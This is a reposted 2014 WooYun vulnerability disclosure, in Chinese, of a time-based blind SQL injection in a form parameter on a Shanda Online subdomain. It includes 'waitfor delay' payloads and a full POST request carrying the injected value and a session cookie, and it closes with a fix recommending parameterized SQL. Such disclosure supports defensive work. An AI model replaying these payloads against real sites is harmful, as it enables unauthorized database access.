记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

盛大在线另一分站某SQL注入

2014-11-10 23:45

未对用户输入正确执行危险字符清理

漏洞证明:

存在问题参数txtGameUserName



测试HTTP请求时间响应Payload:

123'; waitfor delay '0:0:3' 3秒

123'; waitfor delay '0:0:9' 9秒

123'; waitfor delay '0:0:6' 6秒



POST请求



POST /VocGameUserBlockList.aspx HTTP/1.1

Content-Length: 5986

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://voc.sdo.com

Cookie: ASP.NET_SessionId=srabsmfpweyhdp55rz2g21vs; CheckCode=RLT0X

Host: voc.sdo.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



btnGo=%e6%9f%a5%e8%af%a2&ddlGameList=-1&ddlMonth=1&ddlYear=2013&txtGameUserName=n7shji8y';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWRwLS9pqFDgL4wYbfAwL4wbLkBALw7Mj0BALx7Mj0BALy7Mj0BALz7Mj0BAL07Mj0BAL17Mj0BAL27Mj0BALn7Mj0BALo7Mj0BALw7Ij3BALw7IT3BALw7ID3BALph9WsAQK3kvf7BALgh5mvAQLnh7WvAQLmh%2bWsAQKhzfP4BQLjh7WvAQLlh5mvAQL9h%2b2sAQK7jK3RBwK7jI3RBwLK8sPlDwKz6J6lAgLlh%2bmsAQLlh/2sAQLgh9WsAQLjh5mvAQKhzYP4BQKTmuuuBALyh7WvAQLIv6zZBgLl1PKjDQKjzfP4BQLhh5mvAQKegf24BALxgoDkBQLMv4CyDgLlh9WsAQKhzY/4BQLLv6zZBgLKv6zZBgLlh9msAQLjh9msAQKGpY/kCQLmh5mvAQLmh7WvAQLF1JHlAwKu/5iOCAKcgbW7BALlh%2b2sAQLmh7mvAQLyh7mvAQKK5vGPDwLu55DcCALGraPYAwLjh7mvAQKI4YSYAgKVn6nwCgKq//SOCALV/7yOCALhh9msAQLR66H6AQKltqWkDgKltr2iDgKYstehBAKBk/m1C/l8t%2b0ta39wtQp89jXpRANZsxu/&__VIEWSTATE=/wEPDwUJLTU3Nzk1MDI4D2QWAgIBD2QWCAIDD2QWAgIBDxYCHgRUZXh0BcYTPGRpdiBjbGFzcz0iY2xlYXIiPjwvZGl2PiAgPGRsPjxkdCBjbGFzcz0iU1RZTEUyIj7mnIDmlrDlhbPms6g8L2R0PjxkZD48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDE3MDAiPuWGoOWGm%2bi2s%2beQg%2be7j%2beQhuWcqOe6vzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDAzMDAiPumbtuS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDIzMDAiPuWuiOaKpOS5i%2bWJkTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xNDYiPuaCjeWwhuS8oOS4ljwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03NzciPuaYn%2bi%2bsOadgDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03MzMiPuS7meWig%2bS8oOivtOaJi%2bacuueJiDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD05OTEwMDAzNDIiPuWkuuWuneS8oOS4luKAnOeureeBteiniemGkuKAnTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuWkp%2bWei%2ba4uOaIjzwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEiPuS8oOWlh%2bS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00Ij7ng63ooYDkvKDlpYc8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MzkiPuW9qeiZueWym09ubGluZTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD02MSI%2b6ay85ZC554Gv5aSW5LygPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTcwIj7ljYPlubQzPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTc4Ij7msLjmgZLkuYvloZQ8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9NzkiPuS8oOWlh%2bWkluS8oDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00OCI%2b5paw6Iux6ZuE5bm05LujPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEwNiI%2b5Lyg5aWH5b2S5p2lPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEwMSI%2b5pif5bCY5Lyg6K%2b0PC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTg4Ij7mmJ/ovrDlj5g8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9ODkiPum%2bmeS5i%2biwtzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0yMDAwMTI1MDAiPumtlOeVjDI8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9OTMiPuS8oOWlhzM8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAwMDAwNjAwIj7lpLrlrp3kvKDkuJY8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9OTkxMDAwMjgyIj7mianmlaPmgKfnmb7kuIfkuprnkZ/njos8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAwMDAxOTAwIj7mnIDnu4jlubvmg7NYSVY8L2E%2bICA8L2RsPjwvZGQ%2bPGRpdiBjbGFzcz0iY2xlYXIiPjwvZGl2PiAgPGRsPjxkdCBjbGFzcz0iU1RZTEUyIj7kvJHpl7LmuLjmiI88L2R0PjxkZD48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD01Ij7lhpLpmanlsps8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTEiPuazoeazoeWggjwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00NSI%2b6LaF57qn6LeR6LeRPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEzIj7mlrDng63ooYDoi7Hosao8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTQiPueWr%2beLgui1m%2bi9puKFoTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xNyI%2b5Yqf5aSr5bCP5a2QPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTExNiI%2b5rOh5rOh5oiY5aOrPC9hPiAgPC9kbD48L2RkPjxkaXYgY2xhc3M9ImNsZWFyIj48L2Rpdj4gIDxkbD48ZHQgY2xhc3M9IlNUWUxFMiI%2b5bCP6K%2b05bmz5Y%2bwPC9kdD48ZGQ%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAiPui1t%2beCueS4reaWh%2be9kTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuWoseS5kOW5s%2bWPsDwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTYiPui%2buemUi%2ba4uOaIjzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0yMDUiPuS4ieWbveadgE9OTElORTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuaXoOe6v%2bW5s%2bWPsDwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTMwNiI%2b6bqm5bqTPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTIwMDkyNzgwIj7mnInkvaA8L2E%2bICA8L2RsPjwvZGQ%2bZAIFDxAPFgIeC18hRGF0YUJvdW5kZ2QQFQIEMjAxMwQyMDE0FQIEMjAxMwQyMDE0FCsDAmdnZGQCBw8QDxYCHwFnZBAVDAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMhUMATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgkPEA8WAh8BZ2QQFTYP6K%2b36YCJ5oup5ri45oiPFeacgOe7iOW5u%2baDszE0IE9ubGluZQbovrnplIsJ5b2p6Jm55bKbDOi2hee6p%2bi3kei3kQzkvKDlpYflvZLmnaUM5Lyg5aWH5aSW5LygDOS8oOWlh%2bS4lueVjAfkvKDlpYczD%2bS8oOS4lue%2bpOiLseS8oAzkvKDkuJbml6Dlj4wM5aS65a6d5Lyg5LiWDOWcsOWfjuS5i%2bWFiQ/nlq/ni4LotZvovabihaEM5Yqf5aSr5bCP5a2QD%2bmsvOWQueeBr%2bWkluS8oBLmtanmlrnnlLXnq57lubPlj7AM5oKN5bCG5Lyg5LiWGOaJqeaVo%2baAp%2beZvuS4h%2bS6mueRn%2beOiwnpvpnkuYvosLcYTG92ZUxpdmUh5a2m5Zut5YG25YOP56WtB%2bmtlOeVjDIG6bqm5bqTCeWGkumZqeWymwnprZTnlYzmnZEM6a2U546L5pel6K6wD%2bmtlOeJqeeLqeeMjuiAhQnms6Hms6HloIIM5rOh5rOh5oiY5aOrD%2baLvOaImOS4ieWbveW/lwzplIHpk77miJjorrAP6LW354K55Lit5paH572RB%2bWNg%2bW5tDMM54Ot5paX5Lyg6K%2b0DOeDreihgOS8oOWlhwznm5vlpKfliIbnuqIP5LiJ5Zu95p2Ab25saW5lDOaYn%2bWwmOS8oOivtAnmlrDprZTnlYwP5paw54Ot6KGA6Iux6LGqD%2baWsOiLsembhOW5tOS7ownmmJ/ovrDlj5gJ5pif6L6w5p2ABuihgOaXjw7mlrDmsLTmtZJR5LygMgzmsLjmgZLkuYvloZQM5YuH6ICF5LiW55WMBXlvdW5pBuivuOS%2brxDor7jkvq8t5ZCO5a6r6K6hBumjjuS6kRTlhqDlhpvotrPnkIPnu4/nkIZPTAnpm7bkuJbnlYwM5a6I5oqk5LmL5YmRFTYCLTEJMTAwMDAxOTAwATYCMzkCNDUDMTA2Ajc5ATECOTMDMTA4AzE4OAkxMDAwMDA2MDADNzcyAjE0AjE3AjYxATcDMTQ2CTk5MTAwMDI4MgI4OQk3OTEwMDAwMzUJMjAwMDEyNTAwAzMwNgE1Azc2Mwk5OTEwMDA0NjIJNzkxMDAwMDA5AjExAzExNgk3OTEwMDAwMzYJNzkxMDAwMDM3AjEwAjcwAzEwOQE0AjQ5AzIwNQMxMDEDNTgzAjEzAjQ4Ajg4Azc3Nwk5OTEwMDA4MDEJOTkxMDAxMDgxAjc4CTk5MTAwMTM4NgkyMDA5Mjc4MDADNTkxAzY3MQI1MAkxMDAwMDE3MDAJMTAwMDAwMzAwCTEwMDAwMjMwMBQrAzZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZGT8pWHQKSISLSKINERa7vCys41tgg%3d%3d





SQLMAP



voc_sqli.jpg



修复方案:

参数化SQL语句

知识来源: www.wooyun.org/bugs/wooyun-2014-077459

阅读:143349 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“盛大在线另一分站某SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云